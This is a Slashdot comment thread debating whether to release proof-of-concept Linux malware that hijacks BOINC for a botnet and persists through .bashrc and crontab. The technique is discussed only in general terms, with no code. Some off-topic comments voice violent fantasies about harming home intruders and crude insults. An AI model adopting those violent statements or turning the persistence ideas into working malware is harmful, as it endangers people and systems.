Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
McAfee is indeed malware, they after all provide an antivirus for MacOS X that seems to only defend from viruses that can't affect it since their list is 99.9% old MacOS for maybe a dozen pieces of actual mac malware for which they did too little too late while their application is probably one of the rare ones that not only breaks on OS version changes but also on simple OS updates all the fucking time.
That said, true, McAfee is obviously not the only source of malware on linux.
And I'm not worried at all. Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.
“Common sense is not so common.” — Voltaire
However if anyone is tricked into getting running this you may well become a pariah like the writer of the relatively harmless and easily reversible "DS Bricker" when he released his proof of concept Nintento DS malware. Pointing out the wolves is one thing, putting on their clothing and pretending to bite ankles is another and will get you shot like a wolf.
Also what exactly are you trying to educate people about here - that users be tricked into running something effectively like bittorrent for someone else, or ssh for someone else, or is it more than that? We all saw the big purple monkey the first time around so I hope there is more to your argument than that. Many have learnt nothing from the growing malware plague but one more bit of malware is unlikely to change that. Consider all the linux rootkits there has been in the past with nasty tricks like compiling their own kernel modules, what do you have that is worse than that and new?
Not true. I'm off to a D&D game tonight where one guy - oh wait, she ditched him.
Why should a (web)server be allowed to issue any request ? It should be configured to answer queries only, no ? iptables is great and easy to set up for that task. Even for software update, one may push the package needed to the target server in place of the usual pull from the target; so no exceptions are needed on the firewall.
For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice. Installing a new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing. That's why root was invented, isn't it ?
I'm not getting into your house if you make me die in a fire.
What? Have things now become so gentrified that this question even needs to be asked?
Release it already.
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem. By comparison now things are much more secure, but they are also incredibly less exciting, and markedly less progressive. If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.
The software is non-malicious you say? Great! If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions. You would be far from the first person to post non-malicious proof-of-concept code to say, Bugtraq. This is not new ground--no one is going to claim you did something wrong by publishing.
Release it already!
Either we're tough enough to handle it, or we'll get tough enough to handle it.
Your idea have both merit and originality. Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit. Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot. Is your exploit driven by the availability heuristic?? Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood) I am reminded of the saying that the "empty mactchbox makes the most noise". Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware." del./r>null PS. If you find you can't unlock your C:, try "" as a password (without the quotes)
I don't hear linux zealots talk about security through obscurity.
It is the windows zealots who state that as a justification on why windows is so virus and malware prone.
In France it doesn't work that way. One of my mother's friend witnessed it first-hand : strong guys came and knocked down the door of the house my friend had just bought and was renovating, then left. A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himself, even though this person had obviously no proof that he possessed or rented the house, and my friend had the property title. He did some research and found an extreme left website which provided instructions on how to take advantage of the law in this manner, going as far as providing a platform for homeless people to get into contact with the guys who would knock down the door.
A year later the police arrested the man for something completely unrelated (he was a transvestite prostitute), and my friend got his (by then completely destroyed) house back. All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.
Gotta love a country where you can get jailtime for possessing even small amounts of marijuana, but where you can just "steal" a house from someone and thrash it completely without any consequences...
If Linux malware is unheard of, why does McAfee sell LinuxSheld?
The question isn't why they sell it, but why customers buy it, and that is most likely for "Benefit" 4:
LinuxShield protects Microsoft Windows systems by blocking Microsoft Windows viruses from passing through the Linux environment
... if their product can be used as a gateway for malware to enter the system running it. They should at least write a "How to install/run BOINC without being screwed", if not extend of connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the prev protocol allowing a poser to trick the user into downloading "jobs" from them).
Questions raise, answers kill. Raise questions to stay alive.
I doubt it.
Tech savvy != intelligent
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
My linux systems get a lot of attacks every day. SSH, FTP and HTTP attacks are the most common.
On HTTP attacks most ones try to get a page /phpmyadmin or some other (most of the time php-) application which seem to have severe security issues. There are many insecure web applications out there that are not patched or pretty much broken by design.
I bet the security hole you're exploiting is already used in the wild. If that's so, who cares if another kid takes your code and turns it into real malware?
I personally believe it's more benefit to release your code as "penetration test" and help some admins to check their servers of potential security holes than to do nothing in fear of a few kids.
Release it privately to some of the "good guys" so they can fix it?
Can Linux be modified to prevent such malware from being run on any given machine? If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?
I see malware as something that needs fixing. You seriously do not?
To be honest, I don't really see why you are asking /.
You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm. /exit stage, left
If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security thus educating them. Those who do understand computer security, already know it is possible to hack any system and they do not need any kind of demonstration. It has always been possible to hack a system, whether it is windows, mac or linux, ...just wait for a bug and thats it you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in linux too is useless, pointless and even harmful in longterm. Regular people do not understand, do not want to understand and will never understand computer security.
So if you wan't to make thing worse, go, release the code and start to screw up the linux system.
Some things are genuinely ambiguous, and "should I release a sample virus which helps security researchers and malware authors at the same time" is, IMO, pretty ambiguous. The optimal solution would be to find a way just to release it to some security people and then put it out after a few weeks.
If someone wants your network, they will take it regardless of how much security is implemented. It's that simple.
so you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, shure that's possible. The reason why linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw)
if you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite! GETTING that access is the problem! and default-users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute-bit, it's quite hard to make someone execute your binary by accident e.g. by making it look like a word-document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore)
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.
This is pretty silly. Slow news day?
^..^
Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses. Include clear notes of how it works, and what can be done to protect the systems. If you can't trust these people with it, then you should not trust Linux with your data at all. Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.
On a personal note - I also want to say thank you for doing this work. I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.
Intelligence is task specific. You can have brilliant scientists be reduced to bumbling idiots the instant they sit down in front of a computer. Of course it's not a matter of brainpower but a matter of knowledge but they don't have that crucial knowledge and thus make mistakes that, to the average computer geek, look like pure idiocy.
Asking random smart people about the ethical implications of a highly technical issues is not going to give as many insightful answers as asking random technical people does.
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
That seems like an oxymoron to me.
His worm had a little bug in it and see what happened to him :)
"a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects"
Can you provide a link to a demonstration of this Linux 'malware'. One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.
As far as I can make out, users must first download and install BOINC and allow RPC calls. I mean if that's your definition of malware so is me putting a safe in the middle of the street with the combination numbers taped to it. No doubt you would then write a story about just how easy it is to crack that particualr model of safe.
kdawson, have you nothing else to write about ???
I'm not pro-war, but I sure as hell will be happy that war allowed us to developed the nuclear bomb when aliens invade. So I say release it - knowledge is impossible to contain - we are better off adapting to it early.
So the fact that Apple computers are consistently the first to be hacked in pwn2own contests, have completely passed you by?
What is it that makes malware, well, malware?
It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.
Seems like it fits the definition to me. In Windows, malware usually infests the system (registry, files, processes, etc.), and sometimes it's not all that clandestine about it. This would not be so dissimilar from unwanted software which only remains resident in the user $HOME: due to uniform package manage management and vastly improved upon install scripts/configuration, a reinstall is relatively straight forward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance). Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.
Now, is this malware example particularly trivial and not all that attention grabbing? Yes. How did this make FP?
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
It doesn't matter what you do now, some asshat is going to read the description of the "linux malware" reproduce it without bragging about what a l33t script kiddie he is and your going to take the burn for it. As for it being a linux malware
I can understand that
I'm not sure that having the user specifically install a software package that specifically runs downloaded programs is the same class of malware as windose user are typically plagued by anyways. This is more social engineering than a linux security hole and more of a boinc security problem than a linux problem
So basically your saying is Linux is oh-so-secure that you have to trick users into installing your malware.
you may be able to install into .bashrc but it's not going to work in cron without privilege escalation or a security hole; usually only widosers mindlessly type in privelged account passwords to install software to run in limited accounts. In fact I'm calling BS on this, you don't have this malware, you just have a plausible idea for it that you've not bothered to implement.
Apocalypse Cancelled, Sorry, No Ticket Refunds
As long as you release it properly you should do it.
Don't kid yourself. It's the size of the regexp AND how you use it that counts.
"If executed by the user"
We're done here. Next time try a remote exploit requiring no user action. They do exist.
There isn't something all white you could be doing instead? Priorities man! Priorities.
-- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
So one of my users accidentally runs your trojan. No problem. I write a script that cleans it up on every machine in my network without interfering with the users at all. It takes me about 5 minutes.
On MS-Windows, I have to go around to every machine on the network to clean it up. There have been times I've had to re-ghost a machine because it was so infected.
I'm not sure what this whole apple-to-oranges gedanken is all about. It surely doesn't explain how MS-Windows is just as secure as Linux.
Microsoft is to software what Budweiser is to beer.
The pwn2own contest isn't a bunch of people hacking different OS's simultaneously: They draw names from a hat to see who goes first. People aren't hacking from scratch at the contest either: most show up with exploits for multiple OS's that they already know to be working.
Since you get to keep the hardware if you're the first to hack it, OF COURSE EVERYONE CHOOSES TO USE THEIR MAC EXPLOIT FIRST. Vulnerability never even enters into the equation; it's hacked first because people want to win the most expensive and best hardware. Windows immediately falls when the next contestant steps up and can no longer win the Mac hardware.
Of course... Linux did make it all the way through the pwn2own contest in the past.... but it's impossible to say if that's due to lack of interest or the fact that the browser installed on the machine was one the contestants were unfamiliar with and therefore did not have working exploits.
Oh yeah... from reading about it, it seems that pwn2own tests browser security, not the OS - and it doesn't take into account whether the hack lets you execute user level code (the Mac exploits) or run as the kernel (many Windows flaws). So, I don't really see it as being of any real use as an OS security benchmark.
How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?
No one cares what your captcha was
Houston TX, USA
Yes, release it! Security through obscurity isn't. This is needed.
Over-the-top Response Guy! Giving "Over-the-Top Responses" since 1970.
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Yes, she's already sleeping with more than one of your best friends, so go for it!
OMG a buffer overflow vulnerability in package arfafdre-0.54! How utterly tragic.
Now tell me how that really matters to me.
You can't.
All you can do is to make bogus noises about how some buffer overflow bug is equivalent to some Windows malware BRINGING DOWN THE INTERNET.
Your weak insults do not change this fact. ...and if you want to be accurate: Call me a "Unix cheerleader".
A Pirate and a Puritan look the same on a balance sheet.
a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse
As a Linux user who works as a software engineer, I'd be interested to learn about the vulnerabilities that the exploit uses to take control of a Linux system. I have no formal security background, but understand how to use cron and Makefiles for non-nefarious purposes... so a short paper about these attack vectors would be quite educational. I like knowing how to protect myself and knowing how to explain to other people what is right/wrong so they can protect themselves. Not publishing known risks (especially if they're PEBCAK risks) is security through obscurity and I think Linux is a strong enough platform that it shouldn't be relying on this type of security.
Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.
Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs :P
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
Release it, and move on.
File under 'M' for 'Manic ranting'
"Who's" is a contraction of "who is". It should read "There's one thing stronger than all the armies in the world and that is an idea whose time has come. - Victor Hugo"
Free Martian Whores!
huh, crontab is runnable by normal desktop users in most desktop distro's out of the box anyway
It has the bi- prefix.
Just as a lot of other interesting stuff, all starting with "bi-".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Lets put it another way. Even if I left my house door wide open, opened all the windows etc. It still does not give you the right to come in and f*ck with my house.
I'm more inclined to f*ck with your wife, actually.
Support my political activism on Patreon.
I hope you either do not have a door mat, or the door mat does not say "welcome". If the door mat does say welcome, that is in invitation to come in.
My door mat says "go away" just for that reason.
If I remember right there was a case (I forget if it was home or computer based the case was 20+ years ago) where the criminal said hey it said welcome so I went in.
if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman
"I disapprove of what you say, but I will defend to the death your right to say it." - Evelyn Beatrice Hall, re Voltaire
Those involved would have been severely injured if this was me. I'm highly, highly territorial; a person forcibly living in my home would make me extremely paranoid and uncomfortable, I wouldn't be able to sleep or leave the house until I had permanently ejected him. It'd take about 5 minutes for me to assess the situation enough to realize that he's not leaving except by force, at which point my brain would shortcut to causing as much physical harm as possible in quickly increasing magnitude until he left or surrendered.
It's like moving into a wolf's den, with an angry bitchwolf with pups. Except I'm a bachelor, I'm just paranoid (I hate kids too and would never have my own, ever; I'm not sure I could even allow a girlfriend or spouse to reside in the same home as me).
Support my political activism on Patreon.
Then you'd get sued by the intruder...
And to clarify, my friend didn't live in the house yet because of the renovation, which explains how they could take over the house so easily. And he couldn't have lived with the intruder even if he wanted to, because in the eye of the law the intruder was the inhabitant of the house, not my friend, so he'd have had to ask the intruder the permission to live in his own house !
Um, and this is different from a Windows virus how? {...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.
Windows XP way :
Linux way :
In short there are 2 main differences between the windows and unices environment :
There's another big difference, specific to opensource environment like Linux and BSD (and not other unices):
(Although the above only regards malwares exploiting *bugs*, not payload which are simple regular softwares).
With Vista and Seven, Microsoft has attempted to fix some of these problems. Nonetheless, the fix is still a lot noisy ("Cancel or Allow ?") to the point that some user simply start to blindly "Yes-click-through" and the protecting effect is lost. And users are still trained to install crap by downloading it from random websites.
With Linux, these advantages become a handicap regarding commercial softwares : They have to target multiple combination of softwares in distributions (unlike open-source software where the package are vetted by the distribution maintainers themselves thanks to the source being available for that puprose). And these software are not just a package in a regular repository, making them inaccessible using the regular method.
There is indeed no software which is 100% guaranteed secure.
But ! There's still a difference like between putting a real fence around your house and having a dog on one side, and just stick a paper with "don't rob us" written on it on the other side.
And, no matter what, some users will always find a way to shoot themselves in foot.
But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on Windows an armed ready-shoot-gun is just a normal wall decoration.
The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you
Ok, could we please stop with this troll now ?
At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.
At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia play
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
So you want to do away with Ask Slashdot? It's a moral dilemma, he's got the potential to do great good but it just as easily might enable those who would use it for evil. Asking peers for opinions or insight doesn't mean he wants to blame others. There might be things he hasn't though of, or a better way to accomplish things. It's just a smart thing to do.
"Dr. is this the correct incision point, or will cutting here kill the patient?"
"If you have to ask, your ethical compass is b0rked. Dumb@ss n00b!"
Can we mod parent up?
The real reason Linux is malware-free can be summed up in a simple analogy: "You don't let your dog shit in your own front yard." It's no question the preferred box for hackers is a *nix box. Why sully their own yard when there are so many Windows and Mac homes out there with yards perfectly ripe for a fresh Cleavland Steamer?
Like parent says, it's stupid to think of Linux as uncrackable. If there's a port into the system then there's a potential exploit; it doesn't matter what the box is running. It's far more likely that malware hackers just like to have a clean lawn. Leave that shit for some other guy to clean up.
cron would be pretty useless in a multi-user system if multiple users couldn't use it. I actually wrote a shell script that "infected" my FreeBSD box using .*rc files and crontab once. There really is no need to release the software though as the concept is not rocket science. Just write up a description of how it's done. Anyone with UNIX knowledge could replicate it based on the description alone.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
Yes, it's pretty common to run an antivirus program on a Linux-based mail server, specifically to catch Windows viruses in messages it relays. (The Linux version of ClamAV, for instance, seems to be pretty rudimentary in every area but catching email viruses, presumably because there's nothing else it could plausibly do.)
(1)DOCOMEFROM!2~.2'~#1WHILE:1<-"'?.1$.2'~'"':1/.1$.2'~#0"$#65535'"$"'"'&.1$.2'~'#0$#65535'"$#0'~#32767$#1"
Please don't associate BOINC with you little project. It will confuse the casual reader into thinking it is something bad rather than something good.
"Education is not the filling of a pail, but the lighting of a fire." -- William Butler Yeats
Freddy Krueger oven then. If the intruder is such a threat to my continued livelihood, he's hostile and must be executed.
Support my political activism on Patreon.
Why should this be any different from what research scientists do all the time (with actual security holes to boot)? Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it. There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).
I'm not sure that having the user specifically install a software package that specifically runs downloaded programs is the same class of malware as windose user are typically plagued by anyways.
The vast majority of Windows malware is installed via social engineering. Exploits are certainly used but dancing bunnies and fake virus warnings seem to be easier method for the bot herders out there.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
Please stick to Jaunty for now. DO NOT try to install Karmic yourself.
"When information is power, privacy is freedom" - Jah-Wren Ryel
I'm sorry, but running userland "daemons" is child's play. This has been around for EONs. Please don't think you have something new here.
You problem here is that, you idea will only affect the *USER* environment, not the machine. Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user)
This separate the privileges from the user and the system quite well and delineates it.
Lets compare Windows and *NIX (in general):
Windows, I can send you and e-mail and you standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*. This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other account in any address book or just grab your passwords (probably being abcd1234 or password or or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account. Its very much *THAT* simple, no stupidity involved.
Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.
Now speaking of stupidity, its really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged. Not the whole system. Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares. Any program you run or have running to capture data from the user will only affect the *USER* not the whole system. Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things. And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.
greg, REMEMBER ED CURRY!!!
A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean." By that rationale, the best thing would be to simply dump the child out on the streets.
If you see flawed code, submit a patch.
If you see flawed usage, educate users (documentation, blog article, forum posts).
My son's system got hacked that way [backwards "..."] "Here download this program, run it, ignore any warnings, choose 'allow' for every UAC prompt, and then it will give me remote control of your system so I can 'fix' it for you." [...] I was busy in the other room [...] Teenagers, seesh, looking for the quick fix, but adults are just as dumb and fall for the same thing as there are so many helpful strangers on the Internet
The problem, as I see it (and it's only a guess, but hear me out), is one of conditioning.
Windows (I've used 95, 98, XP) tends to warn about pretty harmless stuff. "Are you sure? Only click yes if you want me to do what you just asked me to." Or "Warning: [weird undecipherable sentence about cryptography that will take those who know about crypto a good 15 minutes of research to answer the right way with a modest success rate]. Yes or no?" And clicking "Yes" always works. "Warning: running this program might have side effects (as opposed to just spending its cycles making your CPU hotter). Run it?"
A lot of repeated trials of this ought to condition users to take warnings with a grain (well, bucket) of salt. Add on top of this all the experiences where they copy-paste the error message into google, find a forum post which fixes their problem, or ask someone on IRC and they provide the solution, and people will learn to trust strangers on the internet (because said trust is most often warranted).
Ask yourself how you solve technical problems with your boxes. Do you research everything yourself? Or do you use google/IRC/...?
I don't know exactly how the situation looked through the eyes of said teenagers. Did it really explicitly say "let me take control of your computer"? By your own statement, you were away when it happened. Did you go back and look afterwards?
Most of the things you find on the net is the good stuff. Windows conditions users into not taking warnings as a serious sign of (potential) danger. Is doing what your environment tells you is the right thing called "looking for the quick fix" these days?
then show this code to whomever it will help actually fix those holes but try not to release it to the public at large
I'm sorry to bring up an argument that everyone has already heard (or work out on their own), but I think it warrants a saying (yet again):
How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround? (Good luck on doing that while not releasing information to the general public)
I'd bet half of the people who mock windows users for downloading and installing untrusted software would download this, type in their root password, and let it install.
Why wouldn't they compile it with --prefix=~/local/ instead? That way, you know where you install all your shi^Wsoftware...
here here but let's be frank except for the BOINC and the proxy
stuff he's doing stuff most of us have already thoughed about once upon time
and your going to take the burn for it
oops! I think you chose the wrong homophone. The word you are looking for is "yore".
I would certainly say so. I would say that the moral behavior "emerges" from the crowd, the same way your consciousness "emerges" from the neurons in your brain, even though no individual neuron is conscious. Democracy is premised on a similar idea.
I find this extremely hard to believe, especially because of its anecdotal nature. The French have no notion of private property? If I run through the door as you exit, you can't have me removed because I didn't break the door? If you hire/ask random criminals to do your dirty work, or benefit from others' criminal behaviour, you are not responsible? How did this third person prove it wasn't him who broke the door?
And the French have no protection from vandalism? It's ok to break stuff, for instance furniture or doors, because you can't be prosecuted or sued?
This doesn't ring true. I googled for a while and, as expected, found absolutely nothing to support your story. Do you have links to laws, or even news stories?
Are you a grammar Nazi? I'm trying to improve my English; please correct my errors!
No news story, as there never even was a trial, and I haven't got the time to find links. I guess you'll have to take my word for it, and since it didn't happened to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.
Ofc we have a notion of private property, but it can be really hard to evict tenants, IIRC the guy had signed up for electricity in his own name, and the bills "proved" that he lived there. We also have protection from vandalism, but when the vandal is a former homeless person who is now in jail for prostitution, you don't expect him to have any money nor insurance...
Frankly I don't believe it, but it's not a big deal :) You just got me curious. Thanks for your answer, there's no reason to discuss this further.
Are you a grammar Nazi? I'm trying to improve my English; please correct my errors!
Doesn't that just make it 'ware'?
In too many cases, the questions are along the lines of "I don't feel like doing my homework" or stuff like that. Or questions that could have been answered with the first search result from the text of the question itself. Or they're really slashvertisements. That's why many of these go off-topic; once 20 people have posted "justfuckinggoogleforit", ther's not much more on-topic.
In this case, the poster was either looking for absolution or wanted to brag a bit.
Now, as to doing away with "Ask Slashdot" - why not Ask Slashdot?
Personally, I have no problem with it, but then again, I have no problem with idle.slashdot.org either, so you can be excused for thinking I might be slightly brain-damaged.
The obvious solution would be to continue the renovations, and make it as unpleasant as possible for someone to try to live there.
For instance, by not having any utilities installed while the perpetual renovation prevents it.
By fencing off the place, having the driveway blocked, etc.
Release it. It's not malware in the way that windows malware gets spread. My Linux and FreeBSD boxes ARE more secure than your windows boxes. /.
If it can't be installed without user interaction, it's useless here on
Me thinks it's a hoax and flamebait.
I say things which affects my Karma negatively. (and I don't care) For instance; All religion is false.
I just checked my Arch Linux and the directories cron.d, cron.hourly, cron.daily, cron.weekly and cron.monthly are all root:root and the permissions are 755 so I can execute anything there with my UID but I can't change or install anything without being root. I know some servers will have cron execute a specific script in the user's home but this is usually done on shared hosting servers.
Apocalypse Cancelled, Sorry, No Ticket Refunds
Either you don't fully understand what cron is and how it works or you do and are just putting to much importance into root permissions.
cron allows any user to schedule jobs on a UNIX system. This is not a feature exclusive to shared hosting servers. Every UNIX system supports this out of the box.
Regarding root permissions, malware doesn't need root permissions to connect to a botnet, so root doesn't really matter in regards to whether or not malware can latch onto and use a unix system's resources.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
So go ahead, release the code, I'm not worried. He might even infect 100 machines! Woop de do. If I put the same effort into a windows virus, I could probably own millions in just a matter of days. I don't need a proof of concept, there are plenty of real world examples. Most machines STILL run as admin in the windows world.
Well your mod just went away when you replied to that comment. Thanks. ;)
SIG FAULT: Post index out of bounds.
If you're so afraid, release it, but don't open-source it. Though since you have made this already anyway, people are going to make their own malware eventually.
I am not devoid of humor.
Just send it to me. I'll keep it safe.
A lot of popular closed-source apps like Skype and Flash are available as .deb packages, and if someone is used to downloading .exe and .msi files from random places it's no big leap to do the same with a .deb.
And this is really bad, because it breaks the whole "use one single - or a reduced number - of trusted sources" security principle behind Linux distribution.
Thankfully, some of these software come with a license which allow them to be repackaged by distributors (often the case with Flash).
Sometime, the distributor try to mitigate the problem by providing a 'fetcher' package - which doesn't repack the proprietary software but attempts to retrieve a known-good version from a known-good source (Microsoft's Core-Font are often programmatically downloaded that way). But none the less this makes the user more relying on external sources.
Nonetheless, proprietary close-source applications like Skype pose security threats by themselves, lacking the amount of eyeballs as stated in ESR's "Linus law".
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
How are Windows Vista and Windows 7 better than XP, in screening out the malware? How is MacIntosh better? I will buy a new computer soon. I really need to know!
I just checked my Arch Linux and the directories cron.d, cron.hourly, cron.daily, cron.weekly and cron.monthly are all root:root and the permissions are 755 so I can execute anything there with my UID but I can't change or install anything without being root. I know some servers will have cron execute a specific script in the user's home but this is usually done on shared hosting servers.
Have you tried setting up a crontab file as a normal user? Hint: it should work, though it won't live in /etc.
If it is the same Johannes Buchner that I found through Google, then he lives in Austria, so that specific law doesn't apply to him.
You make a good point that US law shouldn't necessarily be his first worry, but even if his own country doesn't have a similar law against making malware, then there's always the possibility of extradition.
(See the case of Gary McKinnon for one example of a UK citizen that we're working to extradite for hacking charges, and the case of Sholam Weiss (on fraud and money laundering charges) for proof that we do have an extradition treaty with Austria.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").